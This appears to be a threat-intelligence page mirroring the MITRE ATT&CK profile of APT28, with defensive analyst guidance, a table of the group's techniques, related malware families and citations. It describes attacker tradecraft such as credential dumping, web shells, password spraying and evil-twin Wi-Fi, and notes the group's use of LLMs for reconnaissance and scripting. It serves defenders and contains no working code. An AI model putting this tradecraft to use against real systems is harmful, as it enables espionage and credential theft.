G0007: APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
Analyst context for executives and security teams
APT28 matters because ATT&CK describes a long-running, state-attributed intrusion set with documented operations against political, international, scientific, and other sensitive organizations. For leaders, the practical issue is not the name itself; it is whether the organization can withstand credential theft, living-off-the-land activity, malware across multiple endpoint types, cloud/enterprise account attacks, and even close-access or nearby Wi-Fi enabled intrusion paths when the target is strategically interesting.
Executive priority
Treat APT28 as a planning scenario for high-consequence intrusion readiness: executive teams should ask whether identity controls, cloud authentication evidence, endpoint visibility, remote access monitoring, and incident response playbooks can support fast decisions during a suspected espionage or targeted intrusion. The relationship set includes credential tools, backdoors, proxy tooling, Windows utilities, macOS malware, Linux-capable malware, and an Android malware reference, so budget and assurance discussions should focus on coverage across identity, endpoint, network, and cloud—not only perimeter prevention.
Technical view
ATT&CK does not provide a group-level detection section or group-level platforms/tactics for this object, so SOC and IR validation should be driven by the related software and campaign context. Confirm monitoring for credential dumping and harvesting behaviors associated with Mimikatz and OLDBAIT; administrative and living-off-the-land utility use such as Net, certutil, Forfiles, Winexe, and Koadic; backdoor/downloader families including CHOPSTICK, ADVSTORESHELL, Downdelph, CORESHELL, Zebrocy, Cannon, XAgentOSX, and Komplex; proxy/anonymity tooling such as XTunnel and Tor; and removable-media or air-gapped collection risk associated with USBStealer. The C0051 relationship adds a useful readiness check for nearby Wi-Fi exposure, living-off-the-land tradecraft, and vulnerability response around CVE-2022-38028 in the historical campaign context supplied by ATT&CK.
Likely telemetry
- Identity and authentication logs, including failed/successful login patterns and cloud authentication records where available
- Endpoint process creation and command-line telemetry for Windows administrative utilities and scripting/post-exploitation frameworks
- Credential access signals from Windows hosts, including suspicious access to credential material and known credential dumping tool detections
- Network connection, proxy, DNS, and egress telemetry for unusual tunneling, Tor use, or C2-like communications
- EDR/AV detections and file telemetry for related malware families and downloaders
Detection direction
- Map existing detections to the related ATT&CK software rather than relying on the APT28 name alone; the object has no official group-level detection guidance.
- Prioritize behavior-based analytics for credential access, suspicious administrative utility use, remote command execution, downloader/backdoor execution, and proxy/tunneling behavior.
- Tune living-off-the-land detections carefully: Net, certutil, Forfiles, Winexe, and similar tools may be legitimate, so detections should account for user, host role, parent process, command line, destination, timing, and change-control context.
- Validate identity and cloud log retention because the supplied references include a GRU brute-force campaign against enterprise and cloud environments; absence of these logs is a material blind spot.
- Assess wireless and physical-proximity logging for high-risk sites, since the related APT28 Nearest Neighbor Campaign describes use of nearby Wi-Fi networks to gain initial access.
Mitigation priorities
- Start with identity hardening: strong MFA, reduced password reuse, monitoring of brute-force patterns, and rapid credential reset procedures for suspected compromise.
- Harden and monitor administrative tooling rather than attempting to block every native utility; restrict unnecessary remote administration paths and require privileged activity logging.
- Maintain endpoint detection and response coverage across operating systems actually used by the organization, including Windows and any macOS/Linux populations reflected in the related software set.
- Segment sensitive environments and monitor removable-media use, especially where air-gapped, regulated, research, or operational systems exist.
- Include wireless security and physical proximity assumptions in risk reviews for sensitive sites, especially where nearby network access could create an initial-access path.
Analyst notes and limits
The ATT&CK object is a group profile, not a detection rule. Its value is in the relationship set: APT28 is connected to many tools and malware families, plus a campaign involving living-off-the-land techniques, CVE-2022-38028, and nearby Wi-Fi access. This supports a broad readiness assessment across identity, endpoint, cloud authentication evidence, network egress, vulnerability management, and site-level wireless controls.
No official group-level detection text, tactics, or platforms are provided for APT28 in the supplied fields. Platform observations come from related software objects, not from the group object itself. Local exposure, logging availability, control effectiveness, and relevance to a specific organization require environment-specific validation.
APT28
APT28 is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.[1][2] This group has been active since at least 2004.[3][4][5][6][7][8][9][10][11][12][13]
APT28 reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.[5] In 2018, the US indicted five GRU Unit 26165 officers associated with APT28 for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.[14] Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as Sandworm Team.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1003.003 | NTDS Sub-technique | APT28 has used the ntdsutil.exe utility to export the Active Directory database for credential access.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1589.001 | Credentials Sub-technique | APT28 has harvested user's login credentials.CitationMicrosoft Targeting Elections September 2020 |
| Enterprise | T1591 | Gather Victim Org Information | APT28 has used large language models (LLMs) to gather information about satellite capabilities.CitationMSFT-AICitationOpenAI-CTI |
| Enterprise | T1564.001 | Hidden Files and Directories Sub-technique | APT28 has saved files with hidden file attributes.CitationTalos Seduploader Oct 2017CitationTalos Seduploader Oct 2017 |
| Enterprise | T1583.003 | Virtual Private Server Sub-technique | APT28 hosted phishing domains on free services for brief periods of time during campaigns.CitationLeonard TAG 2023 |
| Enterprise | T1596 | Search Open Technical Databases | APT28 has used large language models (LLMs) to assist in script development and deployment.CitationMSFT-AICitationOpenAI-CTI |
| Enterprise | T1583.001 | Domains Sub-technique | APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.CitationFireEye APT28CitationUS District Court Indictment GRU Oct 2018CitationGoogle TAG Ukraine Threat Landscape March 2022 |
| Enterprise | T1070.006 | Timestomp Sub-technique | APT28 has performed timestomping on victim files.CitationCrowdstrike DNC June 2016 |
| Enterprise | T1090.002 | External Proxy Sub-technique | APT28 used other victims as proxies to relay command traffic, for instance using a compromised Georgian military email server as a hop point to NATO victims. The group has also used a tool that acts as a proxy to allow C2 even if the victim is behind a router. APT28 has also used a machine to relay and obscure communications between CHOPSTICK and their server.CitationFireEye APT28CitationBitdefender APT28 Dec 2015CitationDOJ GRU Indictment Jul 2018 |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | APT28 sent spearphishing emails containing malicious Microsoft Office and RAR attachments.CitationUnit 42 Sofacy Feb 2018CitationSofacy DealersChoiceCitationPalo Alto Sofacy 06-2018CitationDOJ GRU Indictment Jul 2018CitationSecurelist Sofacy Feb 2018CitationAccenture SNAKEMACKEREL Nov 2018CitationTrendMicro Pawn Storm Dec 2020CitationSecureworks IRON TWILIGHT Active Measures March 2017CitationCato LAMEHUG JUL 2025 |
| Enterprise | T1059.001 | PowerShell Sub-technique | APT28 downloads and executes PowerShell scripts and performs PowerShell commands.CitationPalo Alto Sofacy 06-2018CitationTrendMicro Pawn Storm Dec 2020CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1048.002 | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol Sub-technique | APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | APT28 has deployed malware that has copied itself to the startup directory for persistence.CitationTrendMicro Pawn Storm Dec 2020 |
| Enterprise | T1027.013 | Encrypted/Encoded File Sub-technique | APT28 encrypted a .dll payload using RTL and a custom encryption algorithm. APT28 has also obfuscated payloads with base64, XOR, and RC4.CitationBitdefender APT28 Dec 2015CitationUnit 42 Sofacy Feb 2018CitationPalo Alto Sofacy 06-2018CitationTalos Seduploader Oct 2017CitationAccenture SNAKEMACKEREL Nov 2018 |
| Enterprise | T1203 | Exploitation for Client Execution | APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.CitationSecurelist Sofacy Feb 2018 |
| Enterprise | T1586.002 | Email Accounts Sub-technique | APT28 has used compromised email accounts to send credential phishing emails.CitationGoogle TAG Ukraine Threat Landscape March 2022 |
| Enterprise | T1114.002 | Remote Email Collection Sub-technique | APT28 has collected emails from victim Microsoft Exchange servers.CitationDOJ GRU Indictment Jul 2018CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1505.003 | Web Shell Sub-technique | APT28 has used a modified and obfuscated version of the reGeorg web shell to maintain persistence on a target's Outlook Web Access (OWA) server.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1584.008 | Network Devices Sub-technique | APT28 compromised Ubiquiti network devices to act as collection devices for credentials compromised via phishing webpages.CitationLeonard TAG 2023 |
| Enterprise | T1550.002 | Pass the Hash Sub-technique | APT28 has used pass the hash for lateral movement.CitationMicrosoft SIR Vol 19 |
| Enterprise | T1037.001 | Logon Script (Windows) Sub-technique | An APT28 loader Trojan adds the Registry key |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1564.003 | Hidden Window Sub-technique | APT28 has used the WindowStyle parameter to conceal PowerShell windows.CitationPalo Alto Sofacy 06-2018 CitationMcAfee APT28 DDE1 Nov 2017 |
| Enterprise | T1090.003 | Multi-hop Proxy Sub-technique | |
| Enterprise | T1567 | Exfiltration Over Web Service | APT28 can exfiltrate data over Google Drive.CitationTrendMicro Pawn Storm Dec 2020 |
| Enterprise | T1056.001 | Keylogging Sub-technique | APT28 has used tools to perform keylogging.CitationMicrosoft SIR Vol 19CitationDOJ GRU Indictment Jul 2018CitationTrendMicro Pawn Storm Dec 2020 |
| Enterprise | T1083 | File and Directory Discovery | |
| Enterprise | T1190 | Exploit Public-Facing Application | APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.CitationUS District Court Indictment GRU Oct 2018CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1669 | Wi-Fi Networks | APT28 has exploited open Wi-Fi access points for initial access to target devices using the network.CitationNearest Neighbor VolexityCitationDOJ GRU Charges 2018 |
| Enterprise | T1039 | Data from Network Shared Drive | APT28 has collected files from network shared drives.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1113 | Screen Capture | APT28 has used tools to take screenshots from victims.CitationESET Sednit Part 2CitationXAgentOSX 2017CitationDOJ GRU Indictment Jul 2018CitationSecureworks IRON TWILIGHT Active Measures March 2017 |
| Enterprise | T1110.001 | Password Guessing Sub-technique | APT28 has used a brute-force/password-spray tooling that operated in two modes: in brute-force mode it typically sent over 300 authentication attempts per hour per targeted account over the course of several hours or days.CitationMicrosoft STRONTIUM New Patterns Cred Harvesting Sept 2020 APT28 has also used a Kubernetes cluster to conduct distributed, large-scale password guessing attacks.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1583.006 | Web Services Sub-technique | APT28 has used newly-created Blogspot pages for credential harvesting operations.CitationGoogle TAG Ukraine Threat Landscape March 2022 |
| Enterprise | T1057 | Process Discovery | An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions.CitationUnit 42 Playbook Dec 2017 |
| Enterprise | T1189 | Drive-by Compromise | |
| Enterprise | T1595.002 | Vulnerability Scanning Sub-technique | APT28 has performed large-scale scans in an attempt to find vulnerable servers.CitationTrendMicro Pawn Storm 2019 |
| Enterprise | T1546.015 | Component Object Model Hijacking Sub-technique | APT28 has used COM hijacking for persistence by replacing the legitimate |
| Enterprise | T1199 | Trusted Relationship | Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.CitationDOJ GRU Indictment Jul 2018 |
| Enterprise | T1120 | Peripheral Device Discovery | APT28 uses a module to receive a notification every time a USB mass storage device is inserted into a victim.CitationMicrosoft SIR Vol 19 |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | An APT28 loader Trojan uses a cmd.exe and batch script to run its payload.CitationUnit 42 Playbook Dec 2017 The group has also used macros to execute payloads.CitationTalos Seduploader Oct 2017CitationUnit42 Cannon Nov 2018CitationAccenture SNAKEMACKEREL Nov 2018CitationTrendMicro Pawn Storm Dec 2020 |
| Enterprise | T1557.004 | Evil Twin Sub-technique | APT28 has used a Wi-Fi Pineapple to set up Evil Twin Wi-Fi Poisoning for the purposes of capturing victim credentials or planting espionage-oriented malware.CitationUS District Court Indictment GRU Oct 2018 |
| Enterprise | T1498 | Network Denial of Service | In 2016, APT28 conducted a distributed denial of service (DDoS) attack against the World Anti-Doping Agency.CitationUS District Court Indictment GRU Oct 2018 |
| Enterprise | T1070.004 | File Deletion Sub-technique | APT28 has intentionally deleted computer files to cover their tracks, including with use of the program CCleaner.CitationDOJ GRU Indictment Jul 2018 |
| Enterprise | T1560 | Archive Collected Data | APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.CitationDOJ GRU Indictment Jul 2018 |
| Enterprise | T1105 | Ingress Tool Transfer | APT28 has downloaded additional files, including by using a first-stage downloader to contact the C2 server to obtain the second-stage implant.CitationBitdefender APT28 Dec 2015CitationUnit 42 Playbook Dec 2017CitationAccenture SNAKEMACKEREL Nov 2018CitationTrendMicro Pawn Storm Dec 2020CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1598 | Phishing for Information | APT28 has used spearphishing to compromise credentials.CitationMicrosoft Targeting Elections September 2020CitationSecureworks IRON TWILIGHT Active Measures March 2017 |
| Enterprise | T1559.002 | Dynamic Data Exchange Sub-technique | |
| Enterprise | T1036.005 | Match Legitimate Resource Name or Location Sub-technique | APT28 has changed extensions on files containing exfiltrated data to make them appear benign, and renamed a web shell instance to appear as a legitimate OWA page.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1119 | Automated Collection | APT28 used a publicly available tool to gather and compress multiple documents on the DCCC and DNC networks.CitationDOJ GRU Indictment Jul 2018 |
| Enterprise | T1078.004 | Cloud Accounts Sub-technique | APT28 has used compromised Office 365 service accounts with Global Administrator privileges to collect email from user inboxes.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1221 | Template Injection | APT28 used weaponized Microsoft Word documents abusing the remote template function to retrieve a malicious macro. CitationUnit42 Sofacy Dec 2018 |
| Enterprise | T1005 | Data from Local System | APT28 has retrieved internal documents from machines inside victim environments, including by using Forfiles to stage documents before exfiltration.CitationÜberwachung APT28 Forfiles June 2015CitationDOJ GRU Indictment Jul 2018CitationTrendMicro Pawn Storm 2019CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1213.002 | Sharepoint Sub-technique | APT28 has collected information from Microsoft SharePoint services within target networks.CitationRSAC 2015 Abu Dhabi Stefano Maccaglia |
| Enterprise | T1078 | Valid Accounts | APT28 has used legitimate credentials to gain initial access, maintain access, and exfiltrate data from a victim network. The group has specifically used credentials stolen through a spearphishing email to login to the DCCC network. The group has also leveraged default manufacturer's passwords to gain initial access to corporate networks via IoT devices such as a VOIP phone, printer, and video decoder.CitationTrend Micro Pawn Storm April 2017CitationDOJ GRU Indictment Jul 2018CitationMicrosoft STRONTIUM Aug 2019CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1025 | Data from Removable Media | An APT28 backdoor may collect the entire contents of an inserted USB device.CitationMicrosoft SIR Vol 19 |
| Enterprise | T1071.001 | Web Protocols Sub-technique | |
| Enterprise | T1213 | Data from Information Repositories | APT28 has collected files from various information repositories.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1218.011 | Rundll32 Sub-technique | APT28 executed CHOPSTICK by using rundll32 commands such as |
| Enterprise | T1560.001 | Archive via Utility Sub-technique | APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection.CitationCybersecurity Advisory GRU Brute Force Campaign July 2021 |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | An APT28 macro uses the command |
| Enterprise | T1598.003 | Spearphishing Link Sub-technique | APT28 has conducted credential phishing campaigns with links that redirect to credential harvesting sites.CitationGoogle TAG Ukraine Threat Landscape March 2022CitationDOJ GRU Indictment Jul 2018CitationESET Zebrocy May 2019CitationUS District Court Indictment GRU Oct 2018CitationSecureworks IRON TWILIGHT Active Measures March 2017 |
| Enterprise | T1542.003 | Bootkit Sub-technique | APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy.CitationESET Sednit Part 3 |
Groups, software, and campaigns
S0645: Wevtutil
S0160: certutil
S0023: CHOPSTICK
CHOPSTICK is a malware family of modular backdoors used by APT28. It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [1] [2] [3] [4] It is tracked separately from the X-Agent for Android.
S0039: Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [1]
Net has a great deal of functionality, [2] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.
S0193: Forfiles
Forfiles is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. [1]
S0243: DealersChoice
DealersChoice is a Flash exploitation framework used by APT28. [1]
S0002: Mimikatz
S0045: ADVSTORESHELL
ADVSTORESHELL is a spying backdoor that has been used by APT28 from at least 2012 to 2016. It is generally used for long-term espionage and is deployed on targets deemed interesting after a reconnaissance phase. [1] [2]
S0351: Cannon
S0162: Komplex
S0135: HIDEDRV
S0044: JHUHUGIT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 5.3 | Current bundle | 1d743dbb2ee5… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
NSA/FBI Drovorub August 2020
NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.
Open source URL -
[2]
Cybersecurity Advisory GRU Brute Force Campaign July 2021
NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
Open source URL -
[3]
DOJ GRU Indictment Jul 2018
Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.
Open source URL -
[4]
Ars Technica GRU indictment Jul 2018
Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.
Open source URL -
[5]
Crowdstrike DNC June 2016
Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.
Open source URL -
[6]
FireEye APT28
FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.
Open source URL -
[7]
SecureWorks TG-4127
SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.
Open source URL -
[8]
FireEye APT28 January 2017
FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.
Open source URL -
[9]
GRIZZLY STEPPE JAR
Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.
Open source URL -
[10]
Sofacy DealersChoice
Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.
Open source URL -
[11]
Palo Alto Sofacy 06-2018
Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
Open source URL -
[12]
Symantec APT28 Oct 2018
Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.
Open source URL -
[13]
ESET Zebrocy May 2019
ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
Open source URL -
[14]
US District Court Indictment GRU Oct 2018
Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.
Open source URL -
[15]
APT28
(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
-
[16]
Accenture SNAKEMACKEREL Nov 2018
Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.
Open source URL -
[17]
ESET Sednit Part 3
ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.
Open source URL -
[18]
FROZENLAKE
(Citation: Leonard TAG 2023)
-
[19]
Fancy Bear
(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
-
[20]
Forest Blizzard
(Citation: Microsoft Threat Actor Naming July 2023)
-
[21]
Group 74
(Citation: Talos Seduploader Oct 2017)
-
[22]
GruesomeLarch
(Citation: Nearest Neighbor Volexity)
-
[23]
IRON TWILIGHT
(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
-
[24]
Kaspersky Sofacy
Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.
Open source URL -
[25]
Leonard TAG 2023
Billy Leonard. (2023, April 19). Ukraine remains Russia’s biggest cyber focus in 2023. Retrieved March 1, 2024.
Open source URL -
[26]
Microsoft STRONTIUM Aug 2019
MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.
Open source URL -
[27]
Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020
Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.
Open source URL -
[28]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[29]
Nearest Neighbor Volexity
Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.
Open source URL -
[30]
Pawn Storm
(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020)
-
[31]
SNAKEMACKEREL
(Citation: Accenture SNAKEMACKEREL Nov 2018)
-
[32]
STRONTIUM
(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
-
[33]
Securelist Sofacy Feb 2018
Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.
Open source URL -
[34]
Secureworks IRON TWILIGHT Active Measures March 2017
Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.
Open source URL -
[35]
Secureworks IRON TWILIGHT Profile
Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.
Open source URL -
[36]
Sednit
This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)
-
[37]
Sofacy
This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)
-
[38]
Swallowtail
(Citation: Symantec APT28 Oct 2018)
-
[39]
TG-4127
(Citation: SecureWorks TG-4127)
-
[40]
Talos Seduploader Oct 2017
Mercer, W., et al. (2017, October 22). "Cyber Conflict" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.
Open source URL -
[41]
Threat Group-4127
(Citation: SecureWorks TG-4127)
-
[42]
TrendMicro Pawn Storm Dec 2020
Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm’s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.
Open source URL -
[43]
Tsar Team
(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)
-
[44]
mitre-attack G0007Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.